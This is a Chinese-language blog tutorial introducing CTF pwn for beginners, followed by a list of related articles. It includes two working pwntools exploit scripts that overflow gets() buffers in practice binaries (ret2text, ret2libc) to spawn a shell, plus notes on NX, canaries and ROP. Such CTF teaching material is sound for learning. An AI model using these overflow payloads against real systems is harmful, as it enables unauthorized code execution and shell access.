CTFpwn总结 入门

最新推荐文章于 2024-07-25 08:36:21 发布
最新推荐文章于 2024-07-25 08:36:21 发布
阅读量2.5w 收藏 148
点赞数 21
分类专栏: 汇编,溢出 pwn技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/80099622
版权

学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。

0x01学pwn需要哪些知识呢?
堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。
能看懂汇编,2条指令要清楚,ret和call。
具备这些基础知识你就能够开始学pwn了。

0x02需要注意什么
在溢出是要清楚2个问题1、哪里有漏洞也就是我们能把自己的代码或者字符放到函数里并影响执行。2、我们要让它执行什么。

    漏洞一般是1、gets函数这种对输入没有限制导致溢出。2、格式化字符串漏洞。3、数据类型转换的时候产生了溢出。学艺不精,这里只讨论第一种,剩下的以后学好了再补上吧。

    总的来说就是对输入的值限制的不够让用户的输入影响了执行流。

    那么如何利用漏洞呢?
        在linux中有一个system函数system("/bin/bash")这条语句就可以调出shell。让程序执行这个函数就能实现对shell的调用了^_^。

0x03简单的pwn

    ```
    nt __cdecl main(int argc, const char **argv, const char **envp)
    {
      char s; // [esp+1Ch] [ebp-64h]

      setvbuf(stdout, 0, 2, 0);
      setvbuf(_bss_start, 0, 1, 0);
      puts("There is something amazing here, do you know anything?");
      gets(&s);
      printf("Maybe I will tell you next time !");
      return 0;
    }
    ```
    这里需要安装pwntools[这里可以安装工具](https://blog.csdn.net/gyhgx/article/details/53439417)
    ```
    from pwn import *
    payload='A'*112+p32(0x0804863a)
    p=process("./ret2text")
    p.recvline()
    p.sendline(payload)
    p.interactive()
    ```
    112临时变量|addr(s)-ebp|+4 0x0804863a这个地址处是
    ```
    .text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"
    .text:08048641                 call    _system
    ```
    看执行结果是不是很神奇
    ![这里写图片描述](https://img-blog.csdn.net/20180426195510640?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MjA0NDgx/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70)

    这个我们比较幸运能找到调用system("/bin/bash")的部分,但是如果我们的程序本身没有调用这个函数呢。下面将会讲解。

0x04是魔高还是道高
当然系统也是有很多保护机制的
checksec工具可以帮助我们查看程序开启的保护。
下面是checksec的执行结果

root@kali:~/桌面# checksec ret2text 
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
[*] '/root/\xe6\xa1\x8c\xe9\x9d\xa2/ret2text'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

现在我接触的2个一个是NX和stack。NX保护是站内代码不可执行。stack是在栈里面放一个canary值这个值一旦被修改就会触发check_failed()函数,打印程序名然后退出。
NX保护:
你不能执行我就不执行,栈里面的内容只负责把程序执行流引入到一个需要的汇编代码的位置处,然后调用程序自己的一些代码来实现攻击。你可以调用含有call或者ret代码这样就能一直连接下去。这就是大佬说的ROP链。
cannary:
函数在执行的时候把一个值放入到栈内的某个位置,我们想要溢出返回地址就要改变这个值,返回的时候系统检查canary值是否改变,如果改变就调用check_failed()函数,打印程序名然后退出。基于这个原理我们可以1、找到canary的值然后填进去。2、可以覆盖掉check_\failed()的调用地址换成system()

0x05如果system和”/bin/bash”没有放在一起怎么办

这是ida反编译结果。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets(&s);
  return 0;
}

和之前唯一不同的是system和字符串“/bin/bash”分开了
下面是脚本

from pwn import *
elf=ELF('ret2libc1')
payload='A'*112+p32(elf.plt['system'])+'aaaa'+p32(0x8049720)
p=process("./ret2libc1")
p.recvline()
p.sendline(payload)
p.interactive()

关注一下payload plt是elf加载动态库用的 ,里面是个地址,存放着一个jmp xxx xxx就是system的地址。’aaaa’是system的返回地址,不需要返回了所以这个值没用,p32(0x8049720)是‘/bin/bash’的地址。需要注意的是上一个例子是只需要传进去参数就行,这里进入system的是ret不仅需要我们布置‘/bin/bash’还需要布置返回地址。

未完待续

九层台
关注
专栏目录
CTF pwn/re手在学习过程中的零碎操作积累
lifanxin的博客
09-06 1523
零碎操作积累概述使用指定版本的libc运行pwn题使用指定版本的libc编译源程序总结 概述   谨以此片文章为我那不争气的记性做个记录,随便造福大家,另外如果各位看官也有些骚操作或者基操的话,也请不吝赐教,留言评论,在下定临表涕零,感激不尽。 使用指定版本的libc运行pwn题   这里给几个下libc的网站: ubuntu glibc官网 清华大学开源镜像站   使用指定版本libc运行pwn题的终端操作: # 指定libc $ LD_PRELOAD=/usr/local/libc/libc-2.2
CTF pwn题堆入门 -- Fast bin
lifanxin的博客
04-07 2450
这里写目录标题概述攻击方式实现任意地址分配fast bin poisoninghouse of spirit总结 概述   Fast bin是堆利用中最常遇见的情况,常见于libc2.23版本的pwn题中,在那个版本中还没有Tcache机制,在那个版本中漏洞利用还很轻松(????)。   这里简单总结一下fast bin的性质,64位机器下fast bin大小为0x20 – 0x80字节,每个bin链表之间以0x10字节递增;32位机器下为0x10 – 0x40,每个bin链表之间以0x8字节递增(上面的大
CTF中pwn的入门指南
热门推荐
菜的只能随便写写博客
09-13 3万+
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
07-25 2942
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
ctf-pwn入门知识
weixin_41038905的博客
04-06 2759
CTF中的pwn指的是通过通过程序本身的漏洞编写利用脚本破解程序拿到主机的权限 了解简单的软件防护技术: 栈保护:Canary 堆栈不可执行:NX(No-eXecute) 地址随机化:PIE(position-independent executable, 地址无关可执行)或者叫ALSR(address space layout randomization) ROP(Return-Oriented...
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2918
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
ctf pwn基础-1
m0_64815693的博客
02-22 2412
pwn基础 嗯,真的努力在讲了
CTF总结-PWN篇
qq_42747131的博客
05-14 7030
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3251
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
CTF PWN Fastbin堆溢出入门
liucc09的博客
12-12 606
目标程序及EXP下载 解题思路 添加新武器时会在偏移52个字节的地方存下上一个武器的内存地址如下: *((_DWORD *)dword_804A288 + 13) = v1; //13个DWORD就是13*4=52字节 输入武器名时存在溢出,因此可以覆盖这个地址,指向另一片内存; 提交订单时会通过单向链表的方式free各个武器的内存区域,由于第1步中可以修改武器链表的上一个武器内存地址,因此可以释放一个我们指定的内存到fastbin中; 我们指定的内存肯定得是我们可以控制的内存,例如程序中的mess
CTF pwn题堆入门 -- Large bin
lifanxin的博客
04-07 1855
Large bin概述攻击方式分配堆到目的地址house of force总结 概述   large bin采用双链表结构,libc-2.23版本下64位机器上,最小为0x400(1024字节),里面的chunk从头结点的fd指针开始,按大小顺序排列。不同于fast bin, small bin, unsorted bin的结构,当属于large bin的chunk被释放时,chunk中还会有fd_nextsize和bk_nextsize指针,分别指向前后第一个与本身chunk大小不同的chunk。当然也就
CTF pwn题堆入门 -- Tcache bin
lifanxin的博客
04-06 4024
Tcache attack序言概述攻击方式绕过Tcache分配堆到目的地址tcache poisoningtcache house of spirit总结 序言 无奈于pwn题中与堆相关的东西实在是比较多,加上到了2021年的现在,ctf比赛中一来就是堆题,还都是新版本libc,对我这种新手中的新手实在不太友好,以此写下这个系列文章,记录自己学习堆漏洞利用过程中的点滴,同时也是个总结吧。结合自己做题的理解,将堆攻击常见的手段和方式按照一定的规律记录下来。本文章系列将分成五大块,即tcache attack
ctf pwn 回顾与总结
weixin_42100211的博客
08-16 699
练习时长两天半的pwn。
CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
键盘的起始页
04-01 819
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
CTF pwn基础
shanzhuli的博客
11-17 190
ctf-pwn题的基础知识,分析学习栈和堆的结构体与利思。依据大小不同划分四中bin:Fast bin、Small bin、Large bin、Unsorted bin。都保存在malloc_sttate结构体中。fastbinsY:这是一个bin数组,里面有NFASTBINS个fast bin。bins:也是一个bin数组,总共126个bin,按顺序分别是:bin 1 为 unsorted binbin 2 到 bin 63 为 small binbin 64 到 bin 126 为 large bin。
CTF 用户态ptmalloc pwn总结(一)
weixin_41918450的博客
09-24 931
kernel pwn题不准备以总结的方式来写,准备每一道题一篇文章专门分析,有很多题网上都有不少解析,我只在github提供的脚本基础上进行复现和分析(因为能力不够,比赛时kernel pwn做不出,只能赛后复现了) 准备讲一下这三道题,关于强网杯的两道题其实是csaw2010的两道题进行了一些修改。最后会写一篇文章进行专门的总结,关于在这三道题复现过程中的问题以及一些利用技巧。 强网杯2018 ...
mprotect+ret2csu
2301_79880074的博客
01-26 1783
寒假学习计划第一轮,通过四道典型题回顾复习。
CTFshow-pwn入门-前置基础pwn32-pwn34
T1ngSh0w的博客
06-21 724
CTFshow-pwn入门-前置基础pwn32-pwn34
ctf pwn 计算器
10-05
引用是一段代码,它使用了Python的pwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn攻击是一个相对较难的领域。 对于你提到的"计算器",如果你是指CTF中的pwn题目中的一个计算器程序,那么你需要先进行程序的分析,找到可能存在的漏洞点。一旦找到漏洞点,你可以通过构造特定输入来利用漏洞,从而获取权限。 在学习CTF pwn攻击时,首先要有扎实的基础知识,包括C语言、汇编语言、Python编程、操作系统原理和Linux操作等方面的知识。这些基础知识将为你提供分析和理解程序的能力。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值